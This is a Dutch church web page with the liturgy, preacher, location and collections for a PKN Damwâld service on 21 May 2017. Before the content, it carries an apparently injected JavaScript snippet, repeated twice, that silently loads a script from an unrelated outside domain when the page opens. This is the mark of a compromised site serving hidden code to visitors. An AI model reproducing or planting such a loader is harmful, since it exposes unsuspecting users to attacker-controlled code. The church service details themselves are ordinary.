;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 21 mei 2017 9:30 uur - PKN Damwâld
zondag 21 mei 2017
09:30 uur
Voorbereiding Heilig Avondmaal

Kerkdienst zondag 21 mei 2017 9:30 uur

Informatie

Voorganger:Ds. J. Miedema, Leeuwarden
Organist:Foeke Wiegersma
Mededeling:Voorbereiding Heilig Avondmaal
Liturgie
Lied voor de dienst Gezang 320: 1,2,3
Welkom en mededelingen
Aanvangslied : psalm 146: 1,2,3
Stilgebed , Votum en groet .
Intochtslied : psalm 103, 1 en 5
Kinderlied Elb 422
Aanvangsgebed .
We zingen: Gezang 437
Gebed om de heilige Geest .
We lezen: Johannes 16: 23b-30
We zingen: Gezang 101
Verkondiging
Voorbereiding Heilig Avondmaal
Collecte
We zingen: gezang 345
Gebeden .
We zingen: gezang 442
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kinderen van Orbei

Sinds 1995 is de stichting Orhei actief in het Oost Europese land Moldavië. Het land wordt momenteel aangemerkt als het allerarmste land van Europa.
De missie van de stichting Orhei is het helpen creëren van het noodzakelijke fundament, een stevige basis, waarmee kansarme minderjarigen en volwassenen in Moldavië zelf in staat worden gesteld haar eigen situatie te verbeteren en daarmee een grondslag te kunnen leggen voor een betere toekomst.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds